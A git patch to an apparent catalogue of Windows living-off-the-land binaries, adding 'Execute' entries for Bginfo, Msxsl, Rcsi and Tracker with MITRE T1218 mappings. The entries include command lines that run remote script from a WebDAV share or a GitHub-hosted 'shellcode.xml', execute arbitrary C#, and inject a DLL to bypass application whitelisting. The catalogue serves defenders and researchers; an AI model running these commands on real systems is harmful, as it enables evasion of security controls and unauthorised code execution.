From c103cb3677281cb94ebc3f67d4e1c2fc8dff56a7 Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Fri, 5 Oct 2018 15:06:01 -0400 Subject: [PATCH] Adding 'Execute' categories to existing 'AWL Bypass' binaries. --- yml/OtherMSBinaries/Bginfo.yml | 26 +++++++++++++++++++++++++- yml/OtherMSBinaries/Msxsl.yml | 16 ++++++++++++++++ yml/OtherMSBinaries/Rcsi.yml | 10 +++++++++- yml/OtherMSBinaries/Tracker.yml | 8 ++++++++ 4 files changed, 58 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index e82b02f..a16f627 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -4,6 +4,14 @@ Description: Background Information Utility included with SysInternals Suite Author: 'Oddvar Moe' Created: '2018-05-25' Commands: + - Command: bginfo.exe bginfo.bgi /popup /nolicprompt + Description: Execute VBscript code that is referenced within the bginfo.bgi file. + Usecase: Local execution of VBScript + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. Usecase: Local execution of VBScript @@ -12,6 +20,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt + Usecase: Remote execution of VBScript + Description: Execute bginfo.exe from a WebDAV server. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. @@ -20,6 +36,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt + Usecase: Remote execution of VBScript + Description: This style of execution may not longer work due to patch. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -39,4 +63,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index e50007c..4cfec8c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -4,6 +4,14 @@ Description: Command line utility used to perform XSL transformations. Author: 'Oddvar Moe' Created: '2018-05-25' Commands: + - Command: msxsl.exe customers.xml script.xsl + Description: Run COM Scriptlet code within the script.xsl file (local). + Usecase: Local execution of script stored in XSL file. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. @@ -12,6 +20,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). + Usecase: Local execution of remote script stored in XSL script stored as an XML file. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 1054b60..b4586b6 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -4,6 +4,14 @@ Description: Non-Interactive command line inerface included with Visual Studio. Author: 'Oddvar Moe' Created: '2018-05-25' Commands: + - Command: rcsi.exe bypass.csx + Description: Use embedded C# within the csx script to execute the code. + Usecase: Local execution of arbitrary C# code stored in local CSX file. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -23,4 +31,4 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- \ No newline at end of file +--- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index 014ac44..fe0a5b5 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -4,6 +4,14 @@ Description: Tool included with Microsoft .Net Framework. Author: 'Oddvar Moe' Created: '2018-05-25' Commands: + - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. + Usecase: Injection of locally stored DLL file into target process. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process.